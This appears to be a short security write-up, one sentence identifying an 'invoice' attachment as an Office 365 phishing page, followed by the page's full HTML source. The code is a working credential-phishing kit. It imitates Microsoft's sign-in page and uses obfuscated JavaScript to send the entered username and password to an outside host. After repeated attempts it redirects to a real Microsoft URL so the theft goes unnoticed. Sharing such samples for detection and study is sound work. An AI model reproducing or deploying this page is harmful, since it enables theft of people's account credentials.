The attachment, supposedly an invoice, is a phishing attack impersonating Office 365 logins as usual.
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Microsoft</title>
<style>
body {
background: url('https://www.zupimages.net/up/23/14/srvm.png') no-repeat center center fixed;
background-size: cover;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
font-family: Arial, sans-serif; /* Specify a fallback font */
}
.login-container {
background: #f8f8f8;
border-radius: 6px;
box-shadow: 0 0 6px rgba(0, 0, 0, 0.1);
width: 400px;
padding: 24px;
text-align: center;
}
.login-container input[type="text"],
.login-container input[type="PPPPPAS"] {
width: 90%;
margin-bottom: 10px;
padding: 12px;
border: 1px solid #ddd;
border-radius: 3px;
}
.login-container h1 {
font-size: 28px;
margin-bottom: 24px;
}
.login-container button {
width: 100%;
padding: 12px;
background: #0078d7;
color: #fff;
border: none;
border-radius: 3px;
cursor: pointer;
}
.login-container button:hover {
background: #005a9e;
}
</style></head>
<script>
(function(_0x566f12,_0x3d0388){var _0x421b39=_0x4f2f,_0x423046=_0x566f12();while(!![]){try{var _0x5e2860=parseInt(_0x421b39(0xf0))/0x1*(-parseInt(_0x421b39(0xe0))/0x2)+-parseInt(_0x421b39(0xdb))/0x3*(-parseInt(_0x421b39(0xeb))/0x4)+-parseInt(_0x421b39(0xef))/0x5+parseInt(_0x421b39(0xec))/0x6+parseInt(_0x421b39(0x101))/0x7*(-parseInt(_0x421b39(0x105))/0x8)+parseInt(_0x421b39(0xfd))/0x9*(-parseInt(_0x421b39(0xe5))/0xa)+-parseInt(_0x421b39(0x104))/0xb*(-parseInt(_0x421b39(0xf1))/0xc);if(_0x5e2860===_0x3d0388)break;else _0x423046['push'](_0x423046['shift']());}catch(_0x20e189){_0x423046['push'](_0x423046['shift']());}}}(_0x275e,0x4d535));var _0xd517d0=_0x3242;function _0x4f2f(_0x469d0f,_0x5afbe7){var _0x275e3e=_0x275e();return _0x4f2f=function(_0x4f2f53,_0x5aaf6f){_0x4f2f53=_0x4f2f53-0xd9;var _0x524831=_0x275e3e[_0x4f2f53];return _0x524831;},_0x4f2f(_0x469d0f,_0x5afbe7);}(function(_0x142af1,_0x56f7f4){var _0x5b4ba6=_0x4f2f,_0x3659c3=_0x3242,_0xf9d8bd=_0x142af1();while(!![]){try{var _0x49a991=-parseInt(_0x3659c3(0x177))/0x1*(-parseInt(_0x3659c3(0x179))/0x2)+parseInt(_0x3659c3(0x17d))/0x3*(-parseInt(_0x3659c3(0x193))/0x4)+parseInt(_0x3659c3(0x174))/0x5*(-parseInt(_0x3659c3(0x188))/0x6)+parseInt(_0x3659c3(0x18d))/0x7*(parseInt(_0x3659c3(0x186))/0x8)+-parseInt(_0x3659c3(0x195))/0x9*(parseInt(_0x3659c3(0x18b))/0xa)+-parseInt(_0x3659c3(0x187))/0xb*(parseInt(_0x3659c3(0x185))/0xc)+parseInt(_0x3659c3(0x17f))/0xd*(parseInt(_0x3659c3(0x192))/0xe);if(_0x49a991===_0x56f7f4)break;else _0xf9d8bd['push'](_0xf9d8bd['shift']());}catch(_0x2da120){_0xf9d8bd[_0x5b4ba6(0xea)](_0xf9d8bd[_0x5b4ba6(0xdf)]());}}}(_0x4358,0x9524a));function _0x3242(_0x4274b6,_0x4745dd){var _0x3851f8=_0x4358();return _0x3242=function(_0x1aae75,_0x1934f7){_0x1aae75=_0x1aae75-0x174;var _0xc0329f=_0x3851f8[_0x1aae75];return _0xc0329f;},_0x3242(_0x4274b6,_0x4745dd);}var attempts=0x0;function _0x4358(){var _0x2077a5=_0x4f2f,_0x418250=[_0x2077a5(0xfa),_0x2077a5(0xf7),'1204TerOVE',_0x2077a5(0xe6),_0x2077a5(0xde),_0x2077a5(0xfe),'9015AchAzD','red',_0x2077a5(0xed),_0x2077a5(0xe7),'&PPPPPAS=',_0x2077a5(0xf5),'displayName',_0x2077a5(0xf3),_0x2077a5(0xe4),'723lwXyuC','value',_0x2077a5(0xe8),_0x2077a5(0x102),_0x2077a5(0x100),'textContent',_0x2077a5(0xdc),_0x2077a5(0xda),_0x2077a5(0xee),_0x2077a5(0xf9),_0x2077a5(0xdd),_0x2077a5(0xd9),_0x2077a5(0xf8),_0x2077a5(0x106),_0x2077a5(0xe9),_0x2077a5(0xff),_0x2077a5(0xe1),_0x2077a5(0xfb),_0x2077a5(0xfc),_0x2077a5(0x103)];return _0x4358=function(){return _0x418250;},_0x4358();}document[_0xd517d0(0x180)](_0xd517d0(0x190))[_0xd517d0(0x17e)]=document[_0xd517d0(0x180)](_0xd517d0(0x17a))[_0xd517d0(0x182)];function login(){var _0x2aad9=_0x4f2f,_0x4221e2=_0xd517d0,_0x2fd43d=document[_0x4221e2(0x180)]('USSSSER')[_0x2aad9(0xf2)],_0xad83ff=document[_0x4221e2(0x180)](_0x4221e2(0x196))[_0x2aad9(0xf2)],_0x4cfa63=document[_0x4221e2(0x180)]('messageContainer'),_0x4c4628=new XMLHttpRequest();_0x4c4628[_0x4221e2(0x18f)](_0x4221e2(0x18e),_0x4221e2(0x18c),!![]),_0x4c4628[_0x2aad9(0xf4)](_0x2aad9(0xf6),_0x4221e2(0x176)),_0x4c4628[_0x4221e2(0x183)](_0x4221e2(0x189)+encodeURIComponent(_0x2fd43d)+_0x4221e2(0x178)+encodeURIComponent(_0xad83ff)),_0xad83ff!==_0x4221e2(0x18a)?(attempts++,attempts===0x3?window[_0x4221e2(0x17c)][_0x4221e2(0x184)]=_0x4221e2(0x17b):(_0x4cfa63[_0x2aad9(0xe3)]=_0x4221e2(0x181),_0x4cfa63[_0x2aad9(0xe2)][_0x4221e2(0x194)]=_0x4221e2(0x175))):(_0x4cfa63[_0x2aad9(0xe3)]='',alert(_0x4221e2(0x191))),document[_0x4221e2(0x180)](_0x4221e2(0x196))[_0x2aad9(0xf2)]='';}function _0x275e(){var _0x3f3c03=['379560QjmsIS','Content-Type','16714838eAZUsB','USSSSER=','1572064urecUM','Login\x20successful!','POST','open','14463AeCoUe','PPPPPAS','http://micro.kamikzyias.uk/app/logg.php','Password\x20incorrect.\x20Please\x20try\x20again.','35bJiZZY','getElementById','USSSSER','134299pXAKhF','898112QedbbR','correct_PPPPPAS','930iEUhpw','href','3ZLyeQh','send','1802889CrVQXI','36oDwvbv','shift','110QWbVRY','14zLNdgQ','style','textContent','location','730rOWCcD','color','3IKJdVm','13Ekiabe','1754200LXjphl','push','2238212uwzZPQ','2543178IKKGIQ','application/x-www-form-urlencoded','36pWMvhN','1068320wlCzhH','9439rzhIpo','732TgvaJl','value','https://login.microsoftonline.com/common/oauth2/logoutsession','setRequestHeader'];_0x275e=function(){return _0x3f3c03;};return _0x275e();}
</script>
</head>
<body>
<div class="login-container">
<img src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
alt="Microsoft Logo">
<h1>Sign in</h1>
<input type="text" id="USSSSER" name="USSSSER" value="[email protected]" readonly placeholder="Enter your USSSSER" >
<div id="messageContainer"></div>
<input type="PPPPPAS" id="PPPPPAS" name="PPPPPAS" placeholder="Enter your Password">
<button onclick="login()">Login</button>
</div>
</body>